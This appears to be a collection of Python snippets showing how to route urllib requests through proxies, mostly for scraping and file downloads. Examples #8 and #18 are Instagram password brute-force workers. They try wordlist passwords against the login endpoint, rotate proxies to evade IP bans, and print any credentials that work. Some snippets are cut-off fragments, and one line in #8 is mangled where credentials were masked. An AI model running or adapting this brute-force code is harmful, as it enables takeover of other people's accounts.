Example #1
from urllib import request

# Without a proxy IP
url = 'http://httpbin.org/ip'
resp = request.urlopen(url)
print(resp.read())

# Using a proxy IP
url = 'http://httpbin.org/ip'
# 1. How a proxy works: when requesting a target site, the request first goes
#    to the proxy server; the proxy server then requests the target site and
#    forwards the response data back to us.
# 2. http://httpbin.org is a handy site for inspecting HTTP request parameters.
# 3. Using a proxy in code:
#    (a) pass a dict of proxies to urllib.request.ProxyHandler
#    (b) create an opener with build_opener and the handler from step (a)
#    (c) call the opener's open() method to make the request
handler = request.ProxyHandler({'http': '118.212.106.7:9999'})
opener = request.build_opener(handler)
resp = opener.open(url)
print(resp.read().decode('utf-8'))
#"origin": "111.18.97.50, 111.18.97.50"
Example #2
'''
Proxy example
'''

from urllib import request

url = 'http://httpbin.org/ip'

proxy = {
    # key-value pairs: include both http and https, each with its matching port
    'http': '50.233.137.33:80',
    'https': '50.233.137.33:80'
}

# create the proxy handler
proxies = request.ProxyHandler(proxy)
# create the opener object
opener = request.build_opener(proxies)
resp = opener.open(url)
print(resp.read().decode())
Example #3
    def _http_opener(self, url, headers=None, auth=True):
        """
            Configure an HTTP opener for sync operations

            Args:
                url: the target URL
                headers: additional headers as a list of (name, value) tuples
                auth: whether to add authentication handlers (default True)
        """

        repository = self.repository
        config = repository.config

        # Configure opener headers
        addheaders = []
        if headers:
            addheaders.extend(headers)

        # Configure opener handlers
        handlers = []

        # Proxy handling
        proxy = repository.proxy or config.proxy or None
        if proxy:
            # Figure out the protocol from the URL
            url_split = url.split("://", 1)
            if len(url_split) == 2:
                protocol = url_split[0]
            else:
                protocol = "http"
            proxy_handler = urllib2.ProxyHandler({protocol: proxy})
            handlers.append(proxy_handler)

        # Authentication handling
        if auth:
            username = repository.username
            password = repository.password
            if username and password:
                # Add a 401 handler (in case Auth header is not accepted)
                passwd_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
                passwd_manager.add_password(
                    realm=None,
                    uri=url,
                    user=username,
                    passwd=password,
                )
                auth_handler = urllib2.HTTPBasicAuthHandler(passwd_manager)
                handlers.append(auth_handler)

        # Create the opener
        opener = urllib2.build_opener(*handlers)
        if auth and username and password:
            # Send credentials unsolicitedly to force login - otherwise
            # the request would be treated as anonymous if login is not
            # required (i.e. no 401 triggered), but we want to login in
            # any case:
            import base64
            base64string = base64.encodestring('%s:%s' %
                                               (username, password))[:-1]
            addheaders.append(("Authorization", "Basic %s" % base64string))

        if addheaders:
            opener.addheaders = addheaders

        return opener
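base64.encodestring in the snippet above is Python 2 only (it was deprecated and then removed in Python 3.9). A standalone Python 3 sketch of the same preemptive Basic-Auth header, with placeholder credentials:

import base64
from urllib import request

username, password = "user", "secret"  # placeholders
token = base64.b64encode(("%s:%s" % (username, password)).encode("utf-8")).decode("ascii")
opener = request.build_opener()
opener.addheaders = [("Authorization", "Basic %s" % token)]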
Example #4
login_data = parse.urlencode([
    ('username', email),
    ('password', passwd),
    ('entry', 'mweibo'),
    ('client_id', ''),
    ('savestate', '1'),
    ('ec', ''),
    ('pagerefer', 'https://passport.weibo.cn/signin/welcome?entry=mweibo&r=http%3A%2F%2Fm.weibo.cn%2F')
])

req = request.Request('https://passport.weibo.cn/sso/login')
req.add_header('Origin', 'https://passport.weibo.cn')
req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
req.add_header('Referer', 'https://passport.weibo.cn/signin/login?entry=mweibo&res=wel&wm=3349&r=http%3A%2F%2Fm.weibo.cn%2F')

with request.urlopen(req, data=login_data.encode('utf-8')) as f:
    print('Status:', f.status, f.reason)
    for k, v in f.getheaders():
        print('%s: %s' % (k, v))
    print('Data:', f.read().decode('utf-8'))

print("----------post end------------")

# with proxy and proxy auth
proxy_handler = request.ProxyHandler({'http': 'http://www.example.com:3128/'})
proxy_auth_handler = request.ProxyBasicAuthHandler()
proxy_auth_handler.add_password('realm', 'host', 'username', 'password')
opener = request.build_opener(proxy_handler, proxy_auth_handler)
with opener.open('http://www.example.com/login.html') as f:
    pass
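As an alternative to ProxyBasicAuthHandler, ProxyHandler also accepts credentials embedded directly in the proxy URL; a sketch with the same placeholder host (user and password must be percent-encoded if they contain special characters):

proxy_handler = request.ProxyHandler(
    {'http': 'http://username:password@www.example.com:3128/'})
opener = request.build_opener(proxy_handler)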
Example #5
import urllib.request as request
import requests

proxies = {
    'https': 'https://127.21.21.1:1080',
    'http': 'http://127.21.21.1:1080'
}

headers = {
    'user-agent':
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'
}

GOOGLE_URL = 'https://www.google.com'
opener = request.build_opener(request.ProxyHandler(proxies))
request.install_opener(opener)

req = request.Request(GOOGLE_URL, headers=headers)
response = request.urlopen(req)
print(response.read().decode())

response = requests.get(GOOGLE_URL, proxies=proxies)
print(response.text)
Example #6
from urllib import request

# # Without a proxy
# url = "http://httpbin.org/ip"
# resp = request.urlopen(url)
# print(resp.read())

# With a proxy
# proxyHandler
url = "http://httpbin.org/ip"
proxyHandler = request.ProxyHandler({"http": "39.137.2.194:8080"})
opener = request.build_opener(proxyHandler)

resp = opener.open(url)
print(resp.read())
Example #7
    'password': '******',
    'passwordCheck': '123456',
    'metadata1': ''
}

missKey = ['customerName', 'email', 'password', 'passwordCheck']

for key in post_dict.keys():
    if key not in missKey:
        elem = driver.find_element_by_name(key)
        value = elem.get_attribute('value')
        post_dict[key] = value

cookie = cookiejar.CookieJar()
handler = request.HTTPCookieProcessor(cookie)
# NOTE: 'sock5' is not a scheme ProxyHandler recognizes (urllib has no
# built-in SOCKS support), and this handler is never passed to build_opener,
# so the request below is actually sent without a proxy.
proxy_support = request.ProxyHandler({'sock5': 'localhost:1080'})
opener = request.build_opener(handler)

headers = {
    'User-Agent':
    'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'
}
req = request.Request(regurl,
                      data=parse.urlencode(post_dict).encode('utf-8'),
                      headers=headers)

print(post_dict)

with opener.open(req) as f:
    with open('c.html', 'wb') as html:
        html.write(f.read())
Example #8
def brute(q):
    """
    main worker function
    :param word:
    :param event:
    :return:
    """
    if not q.empty():
        try:
            proxy = None
            if len(proxys_working_list) != 0:
                proxy = random.choice(list(proxys_working_list.keys()))

            word = q.get()
            word = word.replace("\r", "").replace("\n", "")

            post_data = {
                'username': USER,
                'password': word,
            }

            header = {
                "User-Agent": random.choice(user_agents),
                'X-Instagram-AJAX': '1',
                "X-CSRFToken": csrf_token,
                "X-Requested-With": "XMLHttpRequest",
                "Referer": "https://www.instagram.com/",
                "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                'Cookie': 'csrftoken=' + csrf_token
            }

            if proxy:
                if _verbose:
                    print(bcolors.BOLD + "[*] Trying %s %s " % (word, " | " + proxy,) + bcolors.ENDC)

                opener = rq.build_opener(
                    rq.ProxyHandler({'https': 'https://' + proxy}),
                    rq.HTTPHandler(),
                    rq.HTTPSHandler()
                )

            else:
                if _verbose:
                    print(bcolors.BOLD + "[*] Trying %s" % (word,) + bcolors.ENDC)

                opener = rq.build_opener(
                    rq.HTTPHandler(),
                    rq.HTTPSHandler()
                )

            rq.install_opener(opener)

            req = rq.Request(URL, data=http_parser.urlencode(post_data).encode('ascii'), headers=header)
            sock = rq.urlopen(req)

            if sock.read().decode().find('"authenticated": true') != -1:
                # the literal strings here were redacted in the source; reconstructed:
                print(bcolors.OKGREEN + bcolors.BOLD + "\n[*]Successful Login:")
                print("---------------------------------------------------")
                print("[!]Username: " + USER)
                print("[!]Password: " + word)
                print("---------------------------------------------------\n" + bcolors.ENDC)
                found_flag = True
                q.queue.clear()
                q.task_done()

        except HTTPError as e:
            if e.getcode() == 400 or e.getcode() == 403:
                if e.read().decode("utf8", 'ignore').find('"checkpoint_required"') != -1:
                    print(bcolors.OKGREEN + bcolors.BOLD + "\n[*]Successful Login "
                          + bcolors.FAIL + "But need Checkpoint :|" + bcolors.OKGREEN)
                    print("---------------------------------------------------")
                    print("[!]Username: "******"[!]Password: "******"---------------------------------------------------\n" + bcolors.ENDC)
                    found_flag = True
                    q.queue.clear()
                    q.task_done()
                    return
                elif proxy:
                    print(bcolors.WARNING +
                          "[!]Error: Proxy IP %s is now on Instagram jail ,  Removing from working list !" % (proxy,)
                          + bcolors.ENDC
                          )
                    if proxy in proxys_working_list:
                        proxys_working_list.pop(proxy)
                    print(bcolors.OKGREEN + "[+] Online Proxy: ", str(len(proxys_working_list)) + bcolors.ENDC)
                else:
                    print(bcolors.FAIL + "[!]Error : Your Ip is now on Instagram jail ,"
                          " script will not work fine until you change your ip or use proxy" + bcolors.ENDC)
            else:
                print("Error:", e.getcode())

            q.task_done()
            return

        except Exception as err:
            if _debug:
                print(bcolors.FAIL + "[!] Unknown Error in request." + bcolors.ENDC)
                logger.error(err)
            else:
                print(bcolors.FAIL + "[!] Unknown Error in request, please turn on debug mode with -d" + bcolors.ENDC)

            return
Example #9
from urllib import request

url = 'http://ip.27399.com/'

# 1. Build a dict holding the proxy address
proxy = {"http": "106.13.117.143:3128"}

# 2. Create the proxy handler
proxyHandler = request.ProxyHandler(proxy)

# 3. Build the opener that urllib requires
opener = request.build_opener(proxyHandler)

# 4. Install the opener globally
request.install_opener(opener)

# build the request object
req = request.Request(url)
# make the request
html = request.urlopen(req).read()
print(html.decode())
Example #10
def get_modisfiles(username,
                   password,
                   platform,
                   product,
                   year,
                   tile,
                   proxy,
                   doy_start=1,
                   doy_end=-1,
                   base_url="http://e4ftl01.cr.usgs.gov",
                   out_dir=".",
                   verbose=False,
                   reconnection_attempts=200,
                   check_sizes=False):
    """Download MODIS products for a given tile, year & period of interest

    This function uses the `urllib2` module to download MODIS "granules" from
    the USGS website. The approach is based on downloading the index files for
    any date of interest, and parsing the HTML (rudimentary parsing!) to search
    for the relevant filename for the tile the user is interested in. This file
    is then downloaded in the directory specified by `out_dir`.

    The function can also check if complete files exist locally.
    If it does, it checks that the remote and local file sizes are identical.
    If they are, file isn't downloaded, but if they are different, the remote
    file is downloaded.

    Parameters
    ----------
    username: str
        The EarthData username string
    password: str
        The EarthData password string
    platform: str
        One of three: MOLA, MOLT, MOTA
    product: str
        The product name, such as MOD09GA.005 or MYD15A2.005. Note that you
        need to specify the collection number (005 in the examples)
    year: int
        The year of interest
    tile: str
        The tile (e.g., "h17v04")
    proxy: dict
        A proxy definition, such as {'http': 'http://127.0.0.1:8080', \
        'ftp': ''}, etc.
    doy_start: int
        The starting day of the year.
    doy_end: int
        The ending day of the year.
    base_url: str, url
        The URL to use. Shouldn't be changed, unless USGS change the server.
    out_dir: str
        The output directory. Will be created if it doesn't exist.
    verbose: Boolean
        Whether to print out lots of progress text or not.
    reconnection_attempts: int, default 200
        Number of times to attempt to open HTTP Connection before giving up.
    check_sizes : boolean, default False
        If True then first retrieve remote file size to check against local file.
        Only use on legacy dataset directories which were downloaded before
        13 October 2016, when the code base switched to naming in-progress
        files with .part, rendering this option unnecessary.

    Returns
    -------
    Nothing
    """

    if proxy is not None:
        proxy = urllib2.ProxyHandler(proxy)
        opener = urllib2.build_opener(proxy)
        urllib2.install_opener(opener)

    if not os.path.exists(out_dir):
        if verbose:
            LOG.info("Creating outupt dir %s" % out_dir)
        os.makedirs(out_dir)
    if doy_end == -1:
        if calendar.isleap(year):
            doy_end = 367
        else:
            doy_end = 366

    dates = [
        time.strftime("%Y.%m.%d", time.strptime("%d/%d" % (i, year), "%j/%Y"))
        for i in range(doy_start, doy_end)
    ]
    url = "%s/%s/%s/" % (base_url, platform, product)
    dates_available = None

    count_reconn_attempts = 0
    while count_reconn_attempts <= reconnection_attempts:
        if verbose:
            LOG.info("Session Attempt %d" % (count_reconn_attempts + 1))

        try:
            with requests.Session() as s:
                s.mount(base_url, requests.adapters.HTTPAdapter(max_retries=5))

                ## Login to the EarthData Service for this session
                # First get an authenticity token
                r = s.get('https://urs.earthdata.nasa.gov/')
                parsed_html = BeautifulSoup(r.text, 'lxml')
                token = parsed_html.body.find(
                    'input', attrs={'name': 'authenticity_token'})['value']

                # Now do the login, providing the token
                r = s.post('https://urs.earthdata.nasa.gov/login',
                           data={
                               'username': username,
                               'password': password,
                               'authenticity_token': token,
                               'utf8': '&#x2713;'
                           })
                if not r.ok:
                    raise IOError('Could not log in to EarthData server: %s' %
                                  r)
                else:
                    print('LOGGED IN')
                # Reset return object
                r = None

                if dates_available is None:
                    dates_available = parse_modis_dates(
                        s,
                        url,
                        dates,
                        product,
                        tile,
                        out_dir,
                        check_sizes=check_sizes)

                while len(dates_available) > 0:

                    date = dates_available.pop(0)

                    r = s.get("%s/%s" % (url, date), verify=False)
                    download = False
                    for line in r.text.split("\n"):

                        if (line.find(tile) >= 0) & \
                            (line.find(".hdf") >= 0 > line.find(".hdf.xml")):

                            # Find remote file name and URL
                            fname = line.split("href=")[1].split(">")[0].strip(
                                '"')
                            the_url = "%s%s/%s" % (url, date, fname)

                            # Set download flag
                            download = True
                            r = None
                            # File found so break out of loop
                            break

                    if not download:
                        LOG.info('File not found for date: %s' % date)
                        continue

                    # If local file present, check if it is complete
                    # Incomplete files will still have .part suffix
                    rfile = None
                    if os.path.exists(os.path.join(out_dir, fname)):

                        if check_sizes:
                            # Open link to remote file
                            #r1 = s.request('get', the_url, timeout=(5,5))
                            rfile = s.get(the_url, stream=True, timeout=(5, 5))
                            if not rfile.ok:
                                raise IOError("Can't access... [%s]" % the_url)
                            # Get remote file size
                            remote_file_size = int(
                                rfile.headers['content-length'])

                            local_file_size = os.path.getsize(os.path.join( \
                                out_dir, fname ) )

                            # Skip download if local and remote sizes match
                            if remote_file_size == local_file_size:
                                download = False
                                if verbose:
                                    LOG.info(
                                        "File %s already present. Skipping" %
                                        fname)
                            else:
                                if verbose:
                                    LOG.info(
                                        "Local version of %s incomplete, will be overwritten."
                                        % fname)

                        else:
                            download = False

                    if download:

                        # Open stream to remote file
                        # Stream might have been opened above, check
                        if rfile is None:
                            rfile = s.get(the_url, stream=True, timeout=(9, 9))
                            if not rfile.ok:
                                raise IOError("Can't access... [%s]" % the_url)
                            # Get remote file size
                            remote_file_size = int(
                                rfile.headers['content-length'])

                        LOG.info(
                            "Starting download on %s(%d bytes) ..." %
                            (os.path.join(out_dir, fname), remote_file_size))
                        with open(os.path.join(out_dir, fname + '.part'),
                                  'wb') as fp:
                            for chunk in rfile.iter_content(chunk_size=CHUNKS):
                                if chunk:
                                    fp.write(chunk)
                            #fp.flush() # disabled 2016/11/15, takes ages with no clear benefit
                            #os.fsync(fp.fileno())
                            if verbose:
                                LOG.info("\tDone!")

                        # Once download finished, remove .part suffix
                        os.rename(os.path.join(out_dir, fname + '.part'),
                                  os.path.join(out_dir, fname))

                # Finished looping through dates with while
                if verbose:
                    LOG.info("All downloads complete")

                return

        except requests.exceptions.Timeout:
            # Don't increment connection number
            dates_available.insert(0, date)
            if verbose:
                LOG.info('Timeout error, opening new session')
            continue

        except requests.exceptions.ConnectionError:

            # Increment number of reconnection attempts
            count_reconn_attempts += 1

            # Put the most recent (failed) date back into the list
            dates_available.insert(0, date)

            # Begin the re-connection process (unless max attempts reached)
            continue

        # If we manage to get here then the download session has been successful
        # Break out of the session reconnect loop
        break

    # Raise error if download session failed
    if count_reconn_attempts > reconnection_attempts:
        print('Maximum number of Session reconnection attempts reached.')
        raise requests.exceptions.ConnectionError
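A hypothetical invocation of get_modisfiles; the credentials, product, tile, and proxy values below are illustrative only:

get_modisfiles("ed_user", "ed_pass",          # EarthData credentials (placeholders)
               platform="MOLT", product="MOD09GA.005",
               year=2016, tile="h17v04",
               proxy={'http': 'http://127.0.0.1:8080'},
               doy_start=1, doy_end=32,
               out_dir="./modis", verbose=True)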
Example #11
from urllib import request

url = "http://httpbin.org/ip"
re = request.urlopen(url)
print(re.read().decode("utf-8"))

handler = request.ProxyHandler({"http": "121.237.148.192:3000"})
opener = request.build_opener(handler)
req = request.Request(url)
se = opener.open(req)
print(se.read().decode("utf-8"))
Example #12
import os
import urllib.request as req
from urllib.request import urlretrieve
from bs4 import BeautifulSoup
import json
from pprint import pprint
from utils import BaiDuCartoonUtils
import os.path

url = "http://cartoon.baidu.com/category"

filePath = r"H:/GIT/Python/Spider/CartoonSpider/file/categories/"

user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
# set the proxy IP; plain http didn't work here, so https is used
proxy = req.ProxyHandler({'https': 's1firewall:8080'})
auth = req.HTTPBasicAuthHandler()
# build the opener
opener = req.build_opener(proxy, auth, req.HTTPHandler)
# add headers
opener.addheaders = [('User-Agent', user_agent)]
# install the opener
req.install_opener(opener)
# open the URL
conn = req.urlopen(url)
# read the page content as utf-8
content = conn.read().decode('utf-8')
# print it
print(content)

# create a soup object and get ready to parse the html
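The snippet is cut off at this point; a minimal sketch of the parsing step the last comment announces (the traversal is a guess, not from the source):

soup = BeautifulSoup(content, 'html.parser')
for a in soup.find_all('a'):
    print(a.get('href'), a.get_text(strip=True))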
Example #13
from urllib import request
import time
from lxml import etree

url = "http://www.httpbin.org/ip"
#"124.64.16.94, 124.64.16.94"  #本机的
res = request.urlopen(url).read()
print(res)
# proxy format: {'type': 'ip:port'}
for i in range(1, 6):
    daili_url = "https://www.kuaidaili.com/free/inha/" + str(i) + "/"
    res1 = request.urlopen(daili_url).read().decode()
    ele = etree.HTML(res1)
    IP = ele.xpath('//td[@data-title="IP"]/text()')
    PORT = ele.xpath('//td[@data-title="PORT"]/text()')
    TYPE = ele.xpath('//td[@data-title="类型"]/text()')
    proxy = {}
    for j in range(len(IP)):
        proxy[TYPE[j].lower()] = IP[j] + ":" + PORT[j]  # ProxyHandler expects lowercase scheme keys
        handler = request.ProxyHandler(proxy)  # build a proxy handler
        opener = request.build_opener(handler)
        res2 = opener.open(url).read()
        print(proxy, res2)
        if res2 != res:  # check whether the reported IP differs from our own
            with open("ip.txt", "a", encoding="utf-8") as w:
                w.write(str(proxy) + "\n")
    time.sleep(2)
Example #14
import urllib.request as ur
import random

url = 'https://www.dy2018.com/i/31210.html'

iplist = ['219.157.114.65']
proxy_support = ur.ProxyHandler({'http': random.choice(iplist)})
# create an opener
opener = ur.build_opener(proxy_support)
opener.addheaders = [(
    'User-Agent',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'
)]
# install the opener
ur.install_opener(opener)
response = ur.urlopen(url)
html = response.read().decode('gb2312')
print(html)
Example #15
            data = {}
            data['i'] = a
            data['from'] = 'AUTO'
            data['to'] = 'AUTO'
            data['smartresult'] = 'dict'
            data['client'] = 'fanyideskweb'
            data['doctype'] = 'json'
            data['version'] = '2.1'
            data['keyfrom'] = 'fanyi.web'
            data['action'] = 'FY_BY_REALTlME'
            data['typoResult'] = 'false'
            data = urllib.parse.urlencode(data).encode('utf-8')
            response = url_r.urlopen(url, data)
            cat_imge = response.read().decode('utf-8')
            print(type(cat_imge))
            resoult = json.loads(cat_imge)['translateResult'][0][0]['tgt']
            g.msgbox(resoult, title=title1)


translation()'''  # Youdao Translate scraper (commented out above)

url = 'http://45.32.164.128/ip.php'
proxy_support = url_r.ProxyHandler({'http':'58.253.155.215:9999'})
opener = url_r.build_opener(proxy_support)
opener.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
                                    'Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.62')]
response = url_r.urlopen(url)
html1 = response.read().decode('utf_8')
# html = json.loads(html1)
print(html1)
Example #16
def install_proxy(proxy_handler: Dict[str, str]) -> None:
    proxy_support = request.ProxyHandler(proxy_handler)
    opener = request.build_opener(proxy_support)
    request.install_opener(opener)
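A usage sketch for the helper above; the proxy address is a placeholder:

install_proxy({'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'})
# every urlopen() call from here on goes through the installed opener
resp = request.urlopen('http://httpbin.org/ip')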
Example #17
#     print(error)
#     while retry_num < RETRY:
#         try:
#             proxy = pu.get_random_ip(proxies)
#             handler = req.ProxyHandler({"http": proxy})
#             opener = req.build_opener(handler)
#             req.install_opener(opener)
#             print('retrying %s' % proxy)
#             response = req.urlopen("https://book.douban.com/tag/?view=cloud")
#         except Exception as error:
#             print("Retry %d time. with proxy %s" % (retry_num, proxy))
#             print(error)
#             retry_num += 1
#             continue


handler = req.ProxyHandler({"https": proxy_fixed})

opener = req.build_opener()  # req.build_opener(handler)
opener.addheaders = [('User-agent', 'Mozilla/5.0')]  # addheaders must be a list, not a set
req.install_opener(opener)
response = req.urlopen(testdouban)

soup = bs4.BeautifulSoup(response, 'html.parser')
print(soup)

print(len(proxies))
ip = pu.get_random_ip(proxies)
proxies.remove(ip)

print(len(proxies))
Example #18
def brute(q):
    """
    main worker function
    :param word:
    :param event:
    :return:
    """
    if not q.empty():
        try:
            proxy = None
            if len(proxys_working_list) != 0:
                proxy = random.choice(list(proxys_working_list.keys()))

            word = q.get()
            word = word.replace("\r", "").replace("\n", "")

            post_data = {
                'username': USER,
                'password': word,
            }

            header = {
                "User-Agent": random.choice(user_agents),
                'X-Instagram-AJAX': '1',
                "X-CSRFToken": csrf_token,
                "X-Requested-With": "XMLHttpRequest",
                "Referer": "https://www.instagram.com/",
                "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                'Cookie': 'csrftoken=' + csrf_token
            }

            if proxy:
                if _verbose:
                    print(y+"[+]"+w+" Password incorrect %s %s " % (word, proxy,))

                opener = rq.build_opener(
                    rq.ProxyHandler({'https': 'https://' + proxy}),
                    rq.HTTPHandler(),
                    rq.HTTPSHandler()
                )

            else:
                if _verbose:
                    print(y+"[+]"+w+" Password incorrect %s" % (word,))

                opener = rq.build_opener(
                    rq.HTTPHandler(),
                    rq.HTTPSHandler()
                )

            rq.install_opener(opener)

            req = rq.Request(URL, data=http_parser.urlencode(post_data).encode('ascii'), headers=header)
            sock = rq.urlopen(req)

            if sock.read().decode().find('"authenticated": true') != -1:
                print(c+"\n[+]"+w+" Successfully login")
                print(w+"    Username: " + USER)  # redacted in the source
                print(w+"    Password: " + word)
                found_flag = True
                q.queue.clear()
                q.task_done()

        except HTTPError as e:  # from urllib.error import HTTPError
            if e.getcode() == 400 or e.getcode() == 403:
                if e.read().decode("utf8", 'ignore').find('"checkpoint_required"') != -1:
                    print(c+"\n[!]"+w+" Successfully login, but checkpoint")
                    print("")
                    print(r+"[!]"+w+" Username: " + USER)
                    print(r+"[!]"+w+" Password: " + word)
                    print("")
                    found_flag = True
                    q.queue.clear()
                    q.task_done()
                    return
                elif proxy:
                    print(r+"[!] Error:"+w+" Proxy IP %s now is blocked by instagram" % (proxy,))
                    if proxy in proxys_working_list:
                        proxys_working_list.pop(proxy)
                    print(c+"[+]"+w+" Online Proxy: ", str(len(proxys_working_list)))
                else:
                    print(r+"[!ERROR]"+w+" Your IP now is blocked by instagram")
                    print(r+"[!ERROR]"+w+" Please use Proxy or VPN")
            else:
                print(r+"[!]"+w+" Error:", e.getcode())

            q.task_done()
            return

        except Exception as err:
            if _debug:
                print(r+"[!]"+w+" Problems in the proxy connection")
                logger.error(err)
            else:
                print(r+"[!]"+w+" Problems in the proxy connection")

            return
Example #19
    # print(proxy_listy)

    for p in all_xi_url:
        proxy_lists.append(p[0] + ':' + p[1])
        # print(proxy_lists)
    for uuu in proxy_lists:
        # print(uuu)
        proxy_list = [
            {
                "http": uuu
            },
        ]
        # print(proxy_list)
        # for i in proxy_list:
        proxy = random.choice(proxy_list)
        httpproxy_handler = request.ProxyHandler(proxy)

        opener = request.build_opener(httpproxy_handler)
        req = request.Request('http://httpbin.org/get')

        try:
            response = opener.open(req, timeout=3)
        except error.HTTPError as err:
            print(err.code)
            print(err.reason)
        except error.URLError as err:
            print(err.reason)
        else:
            working_proxy = {'http': str(proxy)}  # avoid shadowing the dict built-in
            # working_proxy['http'] = proxy
            # ci_dict.append(proxy)
Example #20
from urllib import request

px = request.ProxyHandler({'http': '106.60.44.145:80'})
opener = request.build_opener(px)
req = request.Request('http://travel.qunar.com/p-oi5740179-guangzhouta')
res = opener.open(req)
'''With install_opener(), the following lines would make the custom opener global:'''
# request.install_opener(opener)
# res=request.urlopen(req)
with open('a.html', 'wb') as f:
    f.write(res.read())
Example #21
    def __init__(self):
        self.proxy_handler = request.ProxyHandler(randproxies())
        self._cookie = cookiejar.CookieJar()
        self.cookie_handler = request.HTTPCookieProcessor(self._cookie)
        self.opener = request.build_opener(self.proxy_handler,
                                           self.cookie_handler)
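The class above assumes a randproxies() helper that returns a scheme-to-address dict suitable for ProxyHandler; a minimal placeholder implementation:

import random

PROXY_POOL = ['203.0.113.10:8080', '203.0.113.11:8080']  # placeholder addresses

def randproxies():
    addr = random.choice(PROXY_POOL)
    return {'http': addr, 'https': addr}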
Example #22
    def download(self, url):
        time.sleep(3)
        # return None if the URL is empty or the request fails
        if url is None:
            return None
        # Set the proxy IP. With several candidate proxies, keep them in a
        # list and pick one at random: a dict literal with duplicate "http"
        # keys, as in the original, silently keeps only the last entry.
        # (assumes: import random, not shown in this fragment)
        proxy_pool = [
            "192.168.69.118", "192.168.69.117", "192.168.69.115", "192.168.69.114",
            "192.168.69.113", "192.168.69.112", "192.168.69.111", "192.168.69.110",
            "192.168.69.109", "192.168.69.108", "192.168.69.107", "192.168.69.106",
            "192.168.69.105", "192.168.69.104", "192.168.69.103", "192.168.69.102",
            "192.168.69.101", "192.168.69.100", "192.168.69.99", "192.168.69.98",
            "192.168.69.97", "192.168.69.96", "192.168.69.95", "192.168.69.94",
            "192.168.69.93", "192.168.69.92", "192.168.69.91", "192.168.69.90",
            "192.168.69.89", "192.168.69.88", "192.168.69.87", "192.168.69.86",
            "192.168.69.85", "192.168.69.84", "192.168.69.83", "192.168.69.82",
            "192.168.69.81", "192.168.69.80", "192.168.69.79", "192.168.69.78",
            "192.168.69.77", "192.168.69.76", "192.168.69.75", "192.168.69.74",
            "192.168.69.73", "192.168.69.72", "192.168.69.71", "192.168.69.69",
            "192.168.69.68", "192.168.69.67", "192.168.69.66", "192.168.69.65",
            "192.168.69.64", "192.168.69.63", "192.168.69.62", "192.168.69.61",
            "192.168.69.60", "192.168.69.52", "192.168.69.50", "192.168.69.49",
            "192.168.69.48", "192.168.69.47", "192.168.69.46", "192.168.69.45",
            "192.168.69.44", "192.168.69.43", "192.168.69.42", "192.168.69.41",
            "192.168.69.40", "192.168.69.39", "192.168.69.38", "192.168.69.37",
            "192.168.69.36", "192.168.69.35", "192.168.69.34", "192.168.69.33",
            "192.168.69.32", "192.168.69.31", "192.168.69.30", "192.168.69.29",
            "192.168.69.28", "192.168.69.27", "192.168.69.26", "192.168.69.25",
            "192.168.69.24", "192.168.69.23", "192.168.69.22", "192.168.69.21",
            "192.168.69.19", "192.168.69.18", "192.168.69.17", "192.168.69.16",
            "192.168.69.15", "192.168.69.14", "192.168.69.13", "192.168.69.12",
            "192.168.69.11", "192.168.69.10",
        ]
        proxy = {"http": random.choice(proxy_pool)}
        proxy_support = request.ProxyHandler(proxy)
        opener = request.build_opener(proxy_support)
        request.install_opener(opener)

        # set up a cookie processor that saves cookies from the server and sends them with later requests
        cj = http.cookiejar.LWPCookieJar()
        cookie_support = request.HTTPCookieProcessor(cj)
        opener_cookie = request.build_opener(cookie_support,
                                             request.HTTPHandler)
        request.install_opener(opener_cookie)

        # add headers to masquerade as a browser, e.g.:
        #  req.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6')      #添加header
        hdr = {
            'User-Agent':
            'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
            'Accept-Encoding': 'none',
            'Accept-Language': 'en-US,en;q=0.8',
            'Connection': 'keep-alive'
        }
        req = request.Request(url, headers=hdr)
        response = request.urlopen(req)

        if response.getcode() != 200:
            return None
        # return the page source
        return response.read()
Example #23
def unset_proxy():
    proxy_handler = request.ProxyHandler({})
    opener = request.build_opener(proxy_handler)
    request.install_opener(opener)
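Because a ProxyHandler built from an empty dict registers no proxies at all, installing it also disables any proxies picked up from http_proxy/https_proxy environment variables; a usage sketch:

unset_proxy()
# connections now go out directly, bypassing environment-configured proxies
resp = request.urlopen('http://httpbin.org/ip')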
Example #24
from urllib import request, error

if __name__ == '__main__':
    url = "http://www.baidu.com"

    # Add a proxy
    # 1. set the proxy IP
    proxy = {'http':'111.205.46.29:80'}
    # 2. create the ProxyHandler
    proxy_support = request.ProxyHandler(proxy)
    # 3. create the opener
    opener = request.build_opener(proxy_support)
    # 4. install the opener
    request.install_opener(opener)

    try:
        response = request.urlopen(url)
        html = response.read().decode()
        print(html)
    except error.HTTPError as e:
        print(e)
    except error.URLError as e:
        print(e)
    except Exception as e:
        print(e)
Example #25
# Proxy server
proxyHost = "http-cla.abuyun.com"
proxyPort = "9030"

# Proxy tunnel auth credentials (redacted in the source)
proxyUser = "******"
proxyPass = "******"

proxyMeta = "http://%(user)s:%(pass)s@%(host)s:%(port)s" % {
    "host": proxyHost,
    "port": proxyPort,
    "user": proxyUser,
    "pass": proxyPass,
}

proxy_handler = request.ProxyHandler({
    "http": proxyMeta,
    "https": proxyMeta,
})

#auth = request.HTTPBasicAuthHandler()
